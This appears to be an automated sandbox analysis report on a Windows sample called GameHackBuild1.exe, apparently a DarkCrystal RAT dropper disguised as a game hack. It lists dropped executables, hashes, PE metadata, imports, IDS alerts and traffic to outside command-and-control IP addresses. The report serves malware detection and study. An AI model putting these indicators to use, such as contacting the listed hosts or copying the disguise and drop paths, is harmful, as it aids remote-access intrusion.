                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 9%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Windows\Cursors\OfficeClickToRun.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Windows\Cursors\e6c9b481da804f

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):194
                                    Entropy (8bit):5.734228904570716
                                    Encrypted:false
                                    SSDEEP:6:OAlBATdOwFPU7RbVU5WMfX9mLpjTfmq2NH:OY23hU7RZ+8VjTf6H
                                    MD5:8D697F099B56FD1FA1B76AA3E9C7C8FA
                                    SHA1:A3230ABB393A92451B8449D1AC55EA3994E75064
                                    SHA-256:DB8D97DE663C409C5C0320885E5311CB34D8D1DA1145A8B0D8F5E49B2F07B439
                                    SHA-512:4E0140A8FA95E590C21C7D790F2BD5C84AAD04F750A170EE75182806E2EFBADC0DB956FA61855F1C46AAF741A30E756C3426383F9E0DB542970E7C96AC96C6B4
                                    Malicious:false
                                    Preview:X3R8W9KPJgHmPNsUpCKevxSEKx3DXjcgBMwqt5SJByskgQmawnPOADZjkNyjFH1jElkCbBlttAd6Fsh4KdRtTOg8wMFgHsD46Ig5pk8uCge9kcd2p3ZmzIQzEmPO6ElA7i97LmOkehrwthXUtM0NTbEy2q0CUux75eBBcgqDpyHSadGhO5fuOXqfeLEfvMQutu

                                    C:\Windows\L2Schemas\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Windows\L2Schemas\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):185
                                    Entropy (8bit):5.719921347724473
                                    Encrypted:false
                                    SSDEEP:3:djf1VxkzUX9VXIv0yG6LbLr0B4Y45Qxg4pKe73qLuScMkTGCLTtuGrn:DVxk4X9dIv0yG6LQTKWaKS4/LTk8n
                                    MD5:8C292B4E0E897DAD885AF84F6422E931
                                    SHA1:E22614AEE4B75CA03305421D538A3821125F7A86
                                    SHA-256:2FE9FD5D1C79D8CE54738158045CE605C9D0A58793A4C34DB216F5B25E7199CA
                                    SHA-512:8E897C962B5E389FBCA81F1889640015C47658A9D24643F70D023370EAB868F944CC97ABA77CE3D77777403CCA1FCE7D094AA439F954B3ED0496A3F790414994
                                    Malicious:false
                                    Preview:umPOwcEHtzPp53YQ1K36Iw180Iy0lMYdyumJzEPybhze2Gc0upDoenC8uQYnoOfhbw0KRPax4Ffk6XFtp7F6It8LsoZiqmKNCSDGPSjfOQtZHcBXLo7rIiYsxpcm01GS5ShnU9eXXkr29jDQmCXCocEe4USj06pWJbez4YCLJjTi1fsOlLAyeEocN

                                    C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\9e8d7a4ca61bd9

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (911), with no line terminators
                                    Category:dropped
                                    Size (bytes):911
                                    Entropy (8bit):5.916577252045065
                                    Encrypted:false
                                    SSDEEP:12:BobB+o9ftwf8PZ+IEDbovenk0gjEJc0+ycNLlxW6WsmmI+vv6h10ummu4dAj5fnX:OvlVPZhKbseBgB0Wyo6LbmGdAVnM6Pz
                                    MD5:EC60BEB529476271D8B66AE2E3D2E678
                                    SHA1:7CE757448F770C49B54364D6F8E54C0BC41889C3
                                    SHA-256:8DBC1745D6D06D009380BFA2D37A55C1CA0B0E6F652F8ABA4BD9BC82E1A7AF9D
                                    SHA-512:F3C4DB93AA8BD3D774189A1CEEAB54F7244C0132ABA0CA0319C85F782140244C418EF24D28C3D855EF4EB075279BF4414EDBD364547054454FC2FA0B18F1A6B3
                                    Malicious:false
                                    Preview:XYqAGzPLarW8lyR6XtfJhEJVJanNfKwvZdrYbAhLXvS71ADQF7MC7RXSPV0pLCpQ5liHH3eWMUvvvLdJXWIh7txIGYJGK19VGCBQb6JMd00mflhD1rSz4HSMxZAstXMVVaptKNsbM5EH2Knf1GOciJb8tycB5bcFnfRF5x2n91m8DLUmwf0nIuwL8r9Vuqfvd8eX3ijDNldrhd4ie0Paky63tGGOyg3SW1eFr7tO5xahQEofwa14bELpBknwbUOqrKVp8z1hGBfwYYmockbYp91RpzDGT7wkit0Gt8g7iTxajYRm89U130AsSDAJwvOJO4Ooig4eEezWLbsQhaITn5rstHxq7WKxFnLpKnEbEzwYAog1UtmWm4gTMg4btOgrTCRiQDG4WqPxITrFk6VOuyKKG2cosns0TFE8X8lRnr96ptK3yz0w2R6f1GbXkcMs8YdCOsslVDlDyOfXrjz2w58CJjGQhNrKfR7QQIoGHObyq3qnkDqBnT6Cab3plbDHWahhQPHj4tvidJVQ2dpegphMU5zyO8eqKTbPVIXV6HG3iYjRFnxIvjlr3VMVZSU6PEXJrG4tGUhZino6VitkLV4lsuW96B5owKodAZj9sDCbBLIPrQ90itu3Kwb7u5xEY3nY8L569u2ITdjhmGSqCEFCZvSO8mPxP7CIhuQgUC1y1mkqM3VnmHBTxl8N2q8WeE2VaaA1zvVANRKxLlCERlKI6sU6vDonDfTxtOPw3dx1vBGgaLCQo4F33uZsGEGwHs6s7XD6VQLyxTW4mxfkAX8JZa39yhpzWBuDEYiDHG4YsRFkYeFSjgvttwShdEHykWbwjTzNObc4djbIUSlUbXPzPATRFBjD8GyVzTBEp2DHE1QJVKMLdxWMGlgi9hIN1Y5WvFSBRgpjUIv

                                    C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Windows\security\database\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Windows\security\database\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (440), with no line terminators
                                    Category:dropped
                                    Size (bytes):440
                                    Entropy (8bit):5.859005061223187
                                    Encrypted:false
                                    SSDEEP:12:PQH1tRtBj7hx2JVzsv7wUpIdeOkDtwKhEFBIPY/:PQH1tRP6J+vDI0d5w6EFBB
                                    MD5:885E79C945517241586C41D52FECE802
                                    SHA1:D5E0D06AA510679E1BA7499E1AEDFC04F9DEAAB3
                                    SHA-256:BB311682C30A9009735133CF146CC2A74DFA99DD41CF6E852F5C64480FAD0853
                                    SHA-512:F7B080A723990A9331614D980A3EDEE553DD61855F2A6E338DEDF65E28D55097ECF21B23371DD5F144FBC0C48FA04856A2E6A37CB09BB64A7B50B7A1A3814DC1
                                    Malicious:false
                                    Preview:5XGeDHKshHE3UzhoRROjiY8XCEG2b217YFcbqdS9g4wKKrIJpZrGb62hZsb8ARRoQHeOWF7x8OCnmxNV67MCLugbN5C8CT8OnH4DM4wkb3IN3O4lfGCDFOdgkDAaC9voPxAf3KIBKmkRmSh8Bbc6R5JYnXcJ3VhbId7FOZsU7B3coM4SfCZlhzXUol1fs8HyEIJIVculsI8PBqubdKo1564TFnbmhNl93EYfDv6DRx2Y0HS71ZBiTQ2IN0DsAHEfg9W7SOYsNlkIDgc7UdvHLDpmLPSMsOCJtW21vVpmBSVsquFrXFXgW6UcUtvD6LA9iaYqnlM9yIG2s66bJlzm0fwxCZhBjlqzSVJPWYDw3XrNzbuXxU3VWYIDnloODKaNcQkWxqFvhCscxj7loKOPsVd4MGlvtzst7evi0XjGPHxTpqPEnDj35KeG

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.994548666910272
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:GameHackBuild1.exe.bin.exe
                                    File size:9'469'375 bytes
                                    MD5:35a0fbec2fc6d2a550a569719406d58d
                                    SHA1:bc73001a0600313803d3594dc51d3d0813dbdec1
                                    SHA256:221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
                                    SHA512:2f4d71eaa62dded749f82660fd7ee90da422048459d63faa79f518c3c10b7343c482e95cf81cea6bfb4710ef07f53d2d7f835dd3f191029da38da2e9a7beb00f
                                    SSDEEP:196608:uGk5oFaEPX2GgYCCUDQ4yA8/vWOCFidWo+QOovFFoJXz0Bt99OGvFLuyAjA9UCo:9k5/EP2Gac4yHndWo+bodFgXz29OGNps
                                    TLSH:FF963302EEC854B2C8712F7A52699F9426363D001F61FEDFB3945A8DE8702D0D978F66
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                                    File Icon

                                    Icon Hash:1515d4d4442f2d2d

                                    Static PE Info

                                    General

                                    Entrypoint:0x41ec40
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F4D80BE25D9h
                                    jmp 00007F4D80BE1FEDh
                                    cmp ecx, dword ptr [0043E668h]
                                    jne 00007F4D80BE2165h
                                    ret
                                    jmp 00007F4D80BE275Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007F4D80BD4EF7h
                                    mov dword ptr [esi], 00435580h
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 00435588h
                                    mov dword ptr [ecx], 00435580h
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    lea eax, dword ptr [ecx+04h]
                                    mov dword ptr [ecx], 00435568h
                                    push eax
                                    call 00007F4D80BE52FDh
                                    pop ecx
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007F4D80BD4E8Eh
                                    push 0043B704h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007F4D80BE4A12h
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007F4D80BE2104h
                                    push 0043B91Ch
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007F4D80BE49F5h
                                    int3
                                    jmp 00007F4D80BE6A43h
                                    jmp dword ptr [00433260h]
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push 00421EB0h
                                    push dword ptr fs:[00000000h]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2015 UPD3.1 build 24215
                                    • [EXP] VS2015 UPD3.1 build 24215
                                    • [RES] VS2015 UPD3 build 24213
                                    • [LNK] VS2015 UPD3.1 build 24215

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdf98.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x630000xdf980xe000d4fc32bf886ae704fea4f916f9d3a59dFalse0.637451171875data6.661378204564432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    PNG0x636440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                    PNG0x6418c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                    RT_ICON0x657380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                    RT_ICON0x65ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                    RT_ICON0x665480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                    RT_ICON0x673f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                    RT_ICON0x678580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                    RT_ICON0x689000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                    RT_ICON0x6aea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                    RT_DIALOG0x6ec1c0x286dataEnglishUnited States0.5092879256965944
                                    RT_DIALOG0x6eea40x13adataEnglishUnited States0.60828025477707
                                    RT_DIALOG0x6efe00xecdataEnglishUnited States0.6991525423728814
                                    RT_DIALOG0x6f0cc0x12edataEnglishUnited States0.5927152317880795
                                    RT_DIALOG0x6f1fc0x338dataEnglishUnited States0.45145631067961167
                                    RT_DIALOG0x6f5340x252dataEnglishUnited States0.5757575757575758
                                    RT_STRING0x6f7880x1e2dataEnglishUnited States0.3900414937759336
                                    RT_STRING0x6f96c0x1ccdataEnglishUnited States0.4282608695652174
                                    RT_STRING0x6fb380x1b8dataEnglishUnited States0.45681818181818185
                                    RT_STRING0x6fcf00x146dataEnglishUnited States0.5153374233128835
                                    RT_STRING0x6fe380x446dataEnglishUnited States0.340036563071298
                                    RT_STRING0x702800x166dataEnglishUnited States0.49162011173184356
                                    RT_STRING0x703e80x152dataEnglishUnited States0.5059171597633136
                                    RT_STRING0x7053c0x10adataEnglishUnited States0.49624060150375937
                                    RT_STRING0x706480xbcdataEnglishUnited States0.6329787234042553
                                    RT_STRING0x707040xd6dataEnglishUnited States0.5747663551401869
                                    RT_GROUP_ICON0x707dc0x68dataEnglishUnited States0.7019230769230769
                                    RT_MANIFEST0x708440x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                                    Imports

                                    DLLImport
                                    KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                    gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-13T13:35:58.469462+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.74985337.44.238.25080TCP
                                    2025-01-13T13:36:13.751539+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.74990737.44.238.25080TCP
                                    2025-01-13T13:36:23.086316+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74995637.44.238.25080TCP
                                    2025-01-13T13:36:34.528892+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.75001537.44.238.25080TCP
                                    2025-01-13T13:37:23.993180+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.75003937.44.238.25080TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2025 13:35:21.600064993 CET4970225350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:21.604962111 CET2535049702185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:35:21.605140924 CET4970225350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:21.624763966 CET4970225350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:21.629697084 CET2535049702185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:35:42.995593071 CET2535049702185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:35:42.995867014 CET4970225350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:43.247802973 CET4980325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:43.255390882 CET2535049803185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:35:43.255624056 CET4980325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:43.263974905 CET4980325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:35:43.268783092 CET2535049803185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:04.638967037 CET2535049803185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:04.639030933 CET4980325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:04.759735107 CET4987325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:04.765275002 CET2535049873185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:04.765377998 CET4987325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:04.834270000 CET4987325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:04.839226961 CET2535049873185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:26.137505054 CET2535049873185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:26.138348103 CET4987325350192.168.2.7185.37.62.158
